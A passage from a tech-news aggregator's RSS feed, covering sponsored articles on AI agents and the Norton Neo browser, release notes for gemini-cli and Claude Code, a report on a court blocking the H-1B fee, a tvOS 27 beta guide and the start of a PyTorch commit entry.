process.</p><p>These employees are not becoming software engineers in the traditional sense, but they are becoming builders. That changes the talent model. Technical fluency will matter more because employees need to understand what’s possible, what’s risky, and how to evaluate an AI-generated result. Judgment becomes the most important skill.</p><p>The winners will be the people who know how to ask better questions, inspect evidence, refine workflows, and combine domain expertise with enough technical understanding to move from idea to execution.</p><p>For business leaders, this means AI adoption extends beyond an IT rollout, and is actually an organizational redesign. The distance between insight and action will shrink, and companies will need to rethink who is empowered to build, approve, and operate the workflows that run the business.</p><h2>Software economics will change too </h2><p>The shift from interfaces to agents will also challenge how companies buy and measure software, and change how software is priced. Per-seat licensing is giving way to consumption models, where costs reflect actual usage. For most organizations this is a better deal. You pay for value delivered, not licenses that may sit idle.</p><p>But it also changes the accountability calculus. When costs are fixed per seat, budget conversations happen once a year. When costs scale with usage, they require continuous oversight. Without visibility into how agents are used and what they produce, costs can rise quickly.</p><p>The answer is to build measurement in from the start, connecting AI usage to business outcomes, whether that is deals closed, tickets resolved, or cycle times reduced.The companies that succeed will treat AI cost management as part of operational excellence, not procurement cleanup. The question should not be, “How many tokens did we use?” It should be, “What business outcome did that intelligence produce?”</p><h2>Your customers may stop using your interface </h2><p>While the internal implications of agents are significant, the external ones may be even larger. Today, companies obsess over the customer experience inside their applications: the homepage, the navigation, the checkout flow, the dashboard, the mobile screen. Those things will still matter. But increasingly, customers may interact with businesses through their own agents rather than directly through a company’s app or website.</p><p>If a procurement agent compares suppliers, a travel agent books a trip, or a financial agent evaluates products, the customer may never see the interface a company spent years perfecting. The agent will care less about visual design and more about whether the company’s data, policies, pricing, inventory, documentation, and transaction systems are accessible, structured, trustworthy, and machine-readable.</p><p>That means the competitive surface area changes. A company’s brand may still be emotional, but its operational interface will increasingly be data. Businesses that expose confusing, inconsistent, or poorly governed information will be harder for agents to work with. Businesses with clean semantics, reliable APIs, governed data, and clear policies will become easier to choose, easier to transact with, and easier to trust.</p><p>The interface does not vanish only inside the enterprise. It may vanish between enterprises, too.</p><h2>The real AI readiness test </h2><p>Most executives know they need an AI strategy, but fewer have internalized what that really requires. AI readiness is not the number of pilots launched, the number of models tested, or the number of employees with access to a chatbot. It is whether the organization’s knowledge, data, permissions, workflows, and decision logic are ready for machines to reason over them safely.</p><p>For decades, enterprise software forced humans to become translators between business intent and machine logic. AI is reversing that relationship. Machines are beginning to adapt to human intent. But they can only do that if the enterprise has done the work to make its own context legible.</p><p>The future of software is not another screen. It is a system that understands the business well enough to help run it. And that means the next great interface will not look like an interface at all.</p><p><i>Baris Gultekin is VP of AI at Snowflake.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v0.8.57]]></title>
<description><![CDATA[release: v0.8.57 — sleep-resume turns, docker fix, one-command releas…]]></description>
<link>https://tsecurity.de/de/3586751/downloads/v0857/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586751/downloads/v0857/</guid>
<pubDate>Wed, 10 Jun 2026 09:17:41 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>release: v0.8.57 — sleep-resume turns, docker fix, one-command releas…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.47.0-preview.0]]></title>
<description><![CDATA[What's Changed

chore(release): bump version to 0.47.0-nightly.20260602.gcfcecebe8 by @gemini-cli-robot in #27644
Changelog for v0.46.0-preview.0 by @gemini-cli-robot in #27641
Respect backend definitions for 3.5 flash and Update auto mode to use 3.5 flash when the flag is enabled. by @DavidAPier...]]></description>
<link>https://tsecurity.de/de/3586224/downloads/release-v0470-preview0/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3586224/downloads/release-v0470-preview0/</guid>
<pubDate>Wed, 10 Jun 2026 02:16:38 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>chore(release): bump version to 0.47.0-nightly.20260602.gcfcecebe8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576411191" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27644" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27644/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27644">#27644</a></li>
<li>Changelog for v0.46.0-preview.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4575998996" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27641" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27641/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27641">#27641</a></li>
<li>Respect backend definitions for 3.5 flash and Update auto mode to use 3.5 flash when the flag is enabled. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576413853" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27645" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27645/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27645">#27645</a></li>
<li>fix(policy): add EBUSY fallback and TOML parse recovery (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3974849904" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/19919" data-hovercard-type="issue" data-hovercard-url="/google-gemini/gemini-cli/issues/19919/hovercard" href="https://github.com/google-gemini/gemini-cli/issues/19919">#19919</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krishdef7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krishdef7">@krishdef7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037596973" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/21541" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/21541/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/21541">#21541</a></li>
<li>Changelog for v0.45.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576083495" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27642" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27642/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27642">#27642</a></li>
<li>update the max amount of times the Antigravity transition banner can be displayed. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4593177287" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27676" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27676/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27676">#27676</a></li>
<li>chore: remove experimental text from browser agent docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gsquared94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gsquared94">@gsquared94</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614247385" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27746" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27746/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27746">#27746</a></li>
<li>fix(core): implement atomic update in MCP tool discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565539001" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27619" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27619/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27619">#27619</a></li>
<li>Vertex ai model mapping fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616892781" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27749" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27749/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27749">#27749</a></li>
<li>Add documentation and migration commands for Antigravity CLI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625182215" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27765" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27765/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27765">#27765</a></li>
<li>Avoid persisting empty resume sessions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SandyTao520/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SandyTao520">@SandyTao520</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625604569" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27770" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27770/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27770">#27770</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565539001" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27619" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27619/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27619">#27619</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.46.0-preview.3...v0.47.0-preview.0"><tt>v0.46.0-preview.3...v0.47.0-preview.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[See what 3 builders are making with Gemma 4]]></title>
<description><![CDATA[Here’s how three creators are building with Gemma 4, our latest and most advanced family of generative AI open models.]]></description>
<link>https://tsecurity.de/de/3585984/it-nachrichten/see-what-3-builders-are-making-with-gemma-4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585984/it-nachrichten/see-what-3-builders-are-making-with-gemma-4/</guid>
<pubDate>Tue, 09 Jun 2026 22:47:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Gemma_4_builders.max-600x600.format-webp.webp">Here’s how three creators are building with Gemma 4, our latest and most advanced family of generative AI open models.]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.170]]></title>
<description><![CDATA[What's changed

Introducing Claude Fable 5: a Mythos-class model that we’ve made safe for general use. Fable’s capabilities exceed those of any model we’ve ever made generally available. Update to version 2.1.170 for access. https://www.anthropic.com/news/claude-fable-5-mythos-5
Fixed sessions no...]]></description>
<link>https://tsecurity.de/de/3585335/downloads/v21170/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585335/downloads/v21170/</guid>
<pubDate>Tue, 09 Jun 2026 19:31:32 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Introducing Claude Fable 5: a Mythos-class model that we’ve made safe for general use. Fable’s capabilities exceed those of any model we’ve ever made generally available. Update to version 2.1.170 for access. <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5" rel="nofollow">https://www.anthropic.com/news/claude-fable-5-mythos-5</a></li>
<li>Fixed sessions not saving transcripts (and not appearing in --resume) when launched from the VS Code integrated terminal or any shell that inherited Claude Code environment variables.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Every World Cup fan deserves a seat. Norton Neo says its free browser is the ticket]]></title>
<description><![CDATA[Presented by Norton For 39 days this summer, the planet will be doing roughly the same thing at the same time. The 2026 World Cup spans 104 matches across 16 cities in the United States, Canada, and Mexico, with billions of people likely to watch over the course of the tournament. It could very w...]]></description>
<link>https://tsecurity.de/de/3584992/it-nachrichten/every-world-cup-fan-deserves-a-seat-norton-neo-says-its-free-browser-is-the-ticket/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584992/it-nachrichten/every-world-cup-fan-deserves-a-seat-norton-neo-says-its-free-browser-is-the-ticket/</guid>
<pubDate>Tue, 09 Jun 2026 17:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Norton </i></p><hr><p>For 39 days this summer, the planet will be doing roughly the same thing at the same time. The 2026 World Cup spans 104 matches across 16 cities in the United States, Canada, and Mexico, with billions of people likely to watch over the course of the tournament. It could very well be one of the largest shared events the internet has ever been asked to carry. </p><p>What’s changed since the last tournament isn’t the scale, it’s the screen. For a growing share of that audience, the match won’t come through television. It’ll come through a browser tab. The problem is the browser you have today simply does not give you a frictionless and reliable way to watch the World Cup for free.</p><p>In the U.S., a majority of viewers now expect to stream the tournament digitally rather than watch on cable or satellite. It only works when you have a paid subscription. But there is a challenge — for example, fans coming from Europe for who want to watch the game in the U.S. just like they are able to watch it for free in Europe. </p><h2>Watching the World Cup has been harder than it should be</h2><p>Ask anyone who has tried to watch a tournament online and the answers are remarkably consistent across every cycle. Streams stutter and buffer when it matters most. The “free stream” someone forwarded turns out to be a chain of lookalike sites and dead-end links. And the legitimate platforms want a credit card, and maybe a generous helping of personal data too before they’ll play a single minute.</p><h2>One company’s bet: Neo </h2><p>Norton’s answer is <a href="https://neobrowser.ai/tournament">Neo</a>, a browser built on the premise that protection and access can live in the browser software itself rather than in a stack of add-ons the user has to go find, install, and pay for. It's less about adding features than removing friction. Remove the steps between a person and the thing they came to do.</p><p>“The tournament is the kind of moment the modern web was supposed to be great at: everyone, everywhere, on the same thing in real time,” says Howie Xu, Chief AI and Innovation Officer at Gen and its family of brands including Norton. “It sometimes takes a PhD to figure out how to watch matches the right way. Our view is that the browser should have done more of the heavy lifting. That’s why we reinvented the browser to enable a true frictionless, safe, and fast access to the contents they deserve.”</p><p>It's a notable position coming from a security brand that historically sold protection as a separate thing you bought and remembered to run. <!-- -->But Neo removes this separation.<!-- --> Now, they are reinventing the model so the browser is the whole solution for safe, frictionless, fast streaming.</p><h2>The scams arrive before the match does</h2><p>Before official ticket sales opened, fraudsters were already working the tournament: fake listings, cloned resale sites, phishing messages built to harvest money and personal details. The methods are well-worn. Counterfeit “official” portals copy real branding behind lookalike URLs; phishing emails impersonate organizers and dangle exclusive access; social ads promise guaranteed seats at suspiciously low prices and deliver a doctored PDF, or nothing. The same logic follows fans to streaming, where the cheapest, most convenient link is often the most dangerous one.</p><p>This is where Norton’s back catalogue shows up inside everyday browsing. Anti-phishing, scam-site detection, and malicious-page blocking run in the background, flagging dangerous links as they appear rather than after a card number has already been entered. Whether that’s enough to change fan behavior is the open question. People are remarkably willing to click past a warning when a match is about to kick off. But moving the safeguard into the browser, instead of a separate app, puts it where the risk actually is.</p><h2>Access, without the setup wizard</h2><p>There’s also the matter of simply reaching a legitimate stream. Finding officially licensed providers by country, throttled connections at peak hours, and varying restrictions across platforms all get in the way. The usual remedy is configuring a separate VPN with its own account and billing, which is its own kind of friction. Neo folds Norton’s award-winning VPN technology into the browser itself, and it can easily be turned on or off. That matters most in the situations the tournament actually creates: connecting through an unfamiliar hotel network, an airport layover, a bar’s public Wi-Fi where a sizable share of fans say they’ll watch.</p><p>Neo also builds the search for a legitimate stream directly into the browser. It has a dedicated widget with live game schedules, match reminders, and direct streaming links for every game, surfacing the right licensed source for your market without a separate search.</p><p>“Most people don’t want to manage their security or legitimacy of a link, they want to watch the game,” Xu says. “So we shifted the burden away from the person. The protection is on, the connection is private, and you never had to set anything up.”</p><h2>Calm by design</h2><p>Underneath the tournament use case is the idea Neo keeps coming back to: calm by design, with privacy and security working together inside a clean interface rather than buried in a settings menu. Because the browser can anticipate rather than wait to be asked, it surfaces what a fan likely wants next. A reminder about an upcoming match, a quick summary of the day’s results, a nudge to resume where they left off. Personal data stays on the device unless the person decides otherwise.</p><p>Whether this approach wins a meaningful share of a market Chrome still dominates is far from settled. But Norton Neo says they reinvented a browser to make 5.8 billion potential viewers’ lives easier.</p><p>Fans can explore available streams for their market at <a href="https://lp.neobrowser.ai/tournament_stream">lp.neobrowser.ai/tournament_stream</a>.</p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs get temporary relief as US court blocks $100,000 H-1B fee]]></title>
<description><![CDATA[A US federal judge has ruled that the Trump administration’s $100,000 fee on new H-1B visa petitions was unlawful, giving technology companies temporary relief from a policy that threatened to raise the cost of hiring foreign skilled workers.



The decision removes, at least for now, a major cos...]]></description>
<link>https://tsecurity.de/de/3584073/it-nachrichten/cios-get-temporary-relief-as-us-court-blocks-100000-h-1b-fee/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584073/it-nachrichten/cios-get-temporary-relief-as-us-court-blocks-100000-h-1b-fee/</guid>
<pubDate>Tue, 09 Jun 2026 12:03:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A US federal judge has ruled that the Trump administration’s $100,000 fee on new H-1B visa petitions was unlawful, giving technology companies temporary relief from a policy that threatened to raise the cost of hiring foreign skilled workers.</p>



<p>The decision removes, at least for now, a major cost burden for employers that use the <a href="https://www.computerworld.com/article/4178172/developers-on-h-1b-face-a-tighter-job-market-as-ai-shifts-hiring-priorities-2.html" target="_blank">H-1B program</a> to fill roles in domains including software development, cloud computing, data science, and AI.</p>



<p>US District Judge Leo Sorokin in Boston found that the fee functioned as a tax that the administration did not have authority to impose without congressional approval. The ruling came in a lawsuit brought by 20 Democratic state attorneys general challenging the fee.</p>



<p>Standard employer costs for H-1B petitions typically range from about $2,000 to $5,000, making the proposed $100,000 payment a sharp increase for companies seeking foreign talent.</p>



<p>The ruling is unlikely to end uncertainty for employers, with the Trump administration expected to appeal. But it could allow companies that had paused international hiring plans to resume normal recruitment for the <a href="https://www.computerworld.com/article/4122726/restrictive-h%E2%80%911b-policies-drive-tech-talent-back-to-india-reshaping-global-it-2.html">upcoming H-1B cycle</a>, said <a href="https://www.linkedin.com/in/pareekhjain/">Pareekh Jain</a>, CEO of Pareekh Consulting. Still, he said, employers should remain cautious because the legal and policy concerns are likely to continue.</p>



<p>“This provides breathing room for CIOs, even though it’s temporary,” said <a href="https://www.linkedin.com/in/meetneilshah/" target="_blank" rel="noreferrer noopener">Neil Shah</a>, vice president for research and partner at Counterpoint Research. “They should make the necessary contingency plans, whether that means doing more with less by leveraging AI or relying more on local talent.”</p>



<h2 class="wp-block-heading">How companies may rethink hiring</h2>



<p>If higher H-1B costs return in another form, CIOs will have to be more selective about sponsorship, weighing the added cost against the strategic value of the role and the long-term potential of the employee, Shah said.</p>



<p>“Ultimately, the decision comes down to business unit P&amp;L: whether the unit can absorb the cost of acquiring the talent for that role,” Shah added.</p>



<p>That uncertainty could also lead CIOs to compete for talent from other companies, potentially driving up salaries for skilled workers. Some CIOs may conclude that paying a one-time $100,000 fee, amortized over the employee’s tenure, is still more cost-effective than engaging in a bidding war for <a href="https://www.computerworld.com/article/4148621/openai-to-double-workforce-highlights-growing-demand-for-enterprise-ai-talent.html">scarce local talent</a>.</p>



<p><a href="https://www.linkedin.com/in/dr-danish-faruqui/" target="_blank" rel="noreferrer noopener">Danish Faruqui</a>, CEO of Fab Economics, said that CIOs may reserve H-1B sponsorship for a narrower set of mission-critical roles if costs increase.</p>



<p>“If there is such a financial burden, CIOs will justify sponsoring very specific roles,” Faruqui said. “These would be principal enterprise architects, AI, ML, and deep-tech researchers, senior product managers, and regulatory and compliance experts.”</p>



<p>More routine or project-based roles are likely to be treated differently, Faruqui said.</p>



<p>“Junior to mid-level software engineers, entry-level business analysts, and entry-level data scientists would shift from H-1B to domestic hiring,” Faruqui said. “Cloud migration, DevOps, ERP, and CRM implementation could be done through contractors or consulting firms, while QA, product testing, tier-one help desk support, and legacy maintenance are roles that CIOs could prioritize for automation.”</p>



<h2 class="wp-block-heading">Who would be most affected?</h2>



<p>Startups, smaller companies, and enterprise IT departments would have faced the greatest pressure from the fee and stand to benefit most from the ruling, Jain said.</p>



<p>Large technology companies would have been better placed to absorb the $100,000 cost, he said. Meanwhile, companies with mature offshore delivery models may be less likely to increase their reliance on H-1B hiring.</p>



<p><em>The article originally appeared on <a href="https://www.cio.com/article/4182847/cios-get-temporary-relief-as-us-court-blocks-100000-h-1b-fee.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs get temporary relief as US court blocks $100,000 H-1B fee]]></title>
<description><![CDATA[A US federal judge has ruled that the Trump administration’s $100,000 fee on new H-1B visa petitions was unlawful, giving technology companies temporary relief from a policy that threatened to raise the cost of hiring foreign skilled workers.



The decision removes, at least for now, a major cos...]]></description>
<link>https://tsecurity.de/de/3584021/it-nachrichten/cios-get-temporary-relief-as-us-court-blocks-100000-h-1b-fee/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584021/it-nachrichten/cios-get-temporary-relief-as-us-court-blocks-100000-h-1b-fee/</guid>
<pubDate>Tue, 09 Jun 2026 11:47:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A US federal judge has ruled that the Trump administration’s $100,000 fee on new H-1B visa petitions was unlawful, giving technology companies temporary relief from a policy that threatened to raise the cost of hiring foreign skilled workers.</p>



<p>The decision removes, at least for now, a major cost burden for employers that use the <a href="https://www.computerworld.com/article/4178172/developers-on-h-1b-face-a-tighter-job-market-as-ai-shifts-hiring-priorities-2.html" target="_blank">H-1B program</a> to fill roles in domains including software development, cloud computing, data science, and AI.</p>



<p>US District Judge Leo Sorokin in Boston found that the fee functioned as a tax that the administration did not have authority to impose without congressional approval. The ruling came in a lawsuit brought by 20 Democratic state attorneys general challenging the fee.</p>



<p>Standard employer costs for H-1B petitions typically range from about $2,000 to $5,000, making the proposed $100,000 payment a sharp increase for companies seeking foreign talent.</p>



<p>The ruling is unlikely to end uncertainty for employers, with the Trump administration expected to appeal. But it could allow companies that had paused international hiring plans to resume normal recruitment for the <a href="https://www.computerworld.com/article/4122726/restrictive-h%E2%80%911b-policies-drive-tech-talent-back-to-india-reshaping-global-it-2.html">upcoming H-1B cycle</a>, said <a href="https://www.linkedin.com/in/pareekhjain/" rel="nofollow">Pareekh Jain</a>, CEO of Pareekh Consulting. Still, he said, employers should remain cautious because the legal and policy concerns are likely to continue.</p>



<p>“This provides breathing room for CIOs, even though it’s temporary,” said <a href="https://www.linkedin.com/in/meetneilshah/" target="_blank" rel="nofollow">Neil Shah</a>, vice president for research and partner at Counterpoint Research. “They should make the necessary contingency plans, whether that means doing more with less by leveraging AI or relying more on local talent.”</p>



<h2 class="wp-block-heading">How companies may rethink hiring</h2>



<p>If higher H-1B costs return in another form, CIOs will have to be more selective about sponsorship, weighing the added cost against the strategic value of the role and the long-term potential of the employee, Shah said.</p>



<p>“Ultimately, the decision comes down to business unit P&amp;L: whether the unit can absorb the cost of acquiring the talent for that role,” Shah added.</p>



<p>That uncertainty could also lead CIOs to compete for talent from other companies, potentially driving up salaries for skilled workers. Some CIOs may conclude that paying a one-time $100,000 fee, amortized over the employee’s tenure, is still more cost-effective than engaging in a bidding war for <a href="https://www.computerworld.com/article/4148621/openai-to-double-workforce-highlights-growing-demand-for-enterprise-ai-talent.html">scarce local talent</a>.</p>



<p><a href="https://www.linkedin.com/in/dr-danish-faruqui/" target="_blank" rel="nofollow">Danish Faruqui</a>, CEO of Fab Economics, said that CIOs may reserve H-1B sponsorship for a narrower set of mission-critical roles if costs increase.</p>



<p>“If there is such a financial burden, CIOs will justify sponsoring very specific roles,” Faruqui said. “These would be principal enterprise architects, AI, ML, and deep-tech researchers, senior product managers, and regulatory and compliance experts.”</p>



<p>More routine or project-based roles are likely to be treated differently, Faruqui said.</p>



<p>“Junior to mid-level software engineers, entry-level business analysts, and entry-level data scientists would shift from H-1B to domestic hiring,” Faruqui said. “Cloud migration, DevOps, ERP, and CRM implementation could be done through contractors or consulting firms, while QA, product testing, tier-one help desk support, and legacy maintenance are roles that CIOs could prioritize for automation.”</p>



<h2 class="wp-block-heading">Who would be most affected?</h2>



<p>Startups, smaller companies, and enterprise IT departments would have faced the greatest pressure from the fee and stand to benefit most from the ruling, Jain said.</p>



<p>Large technology companies would have been better placed to absorb the $100,000 cost, he said. Meanwhile, companies with mature offshore delivery models may be less likely to increase their reliance on H-1B hiring.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Releases tvOS 27 Beta 1 For Developer Testing]]></title>
<description><![CDATA[Following its recent WWDC 2026 keynote presentation, Apple is moving quickly to get its newest software into the hands of developers. The company has officially released the first developer beta for tvOS 27, giving builders a chance to test out upcoming changes for compatible devices. While a pub...]]></description>
<link>https://tsecurity.de/de/3583254/ios-mac-os/apple-releases-tvos-27-beta-1-for-developer-testing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583254/ios-mac-os/apple-releases-tvos-27-beta-1-for-developer-testing/</guid>
<pubDate>Tue, 09 Jun 2026 02:49:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Following its recent WWDC 2026 keynote presentation, Apple is moving quickly to get its newest software into the hands of developers. The company has officially released the first developer beta for tvOS 27, giving builders a chance to test out upcoming changes for compatible devices. While a public release is expected later this summer, this initial version remains focused on software testing and gathering early feedback from the developer community.



What the new update brings to the screen



The latest version introduces several background improvements. According to the release notes, it includes a background assets feature that reduces storage usage by downloading localized asset packs based on user language preferences.



Additionally, the software integrates with Apple Intelligence in the Home app. This means HomeKit Secure Video recordings will be processed on the device and through Private Cloud Compute for video descriptions and search. 



How you can download the developer beta right now



If you want to install this early version on your Apple TV, you no longer need a paid developer account. Anyone can access the developer beta directly from the device settings.



Here are the steps to get it on your hardware:




Turn on your device and open the Settings app



Scroll down and select the System menu



Click on Software Update



Choose the Beta Updates section



Select the tvOS 27 Developer Beta option to begin the download




Why regular users should wait for the public release



Even though anyone can access the download, Apple intends for this first beta to be used strictly for software development. The company expects bugs and performance issues in this early build.



Because of potential glitches, installing it on your primary device is not recommended. A more stable public beta is scheduled to arrive in early July, which will offer a safer testing environment for those who just want to try the new software.



Early betas always carry some risk of instability, but they give us a clear view of where the platform is heading. Developers now have the next month to report issues and optimize their applications before the public gets involved. If you rely on your television setup for daily viewing, holding off until July is the smartest move.]]></content:encoded>
</item>
<item>
<title><![CDATA[viable/strict/1780951453: [dynamo] Box resume frame values when del can run (#185561)]]></title>
<description><![CDATA[Dynamo resume functions pass restored stack values and locals as normal
positional arguments. CPython keeps those argument references alive for the
whole resume call, so a DELETE_FAST in the resumed bytecode can remove the
local name without actually releasing the tensor. That makes compiled grap...]]></description>
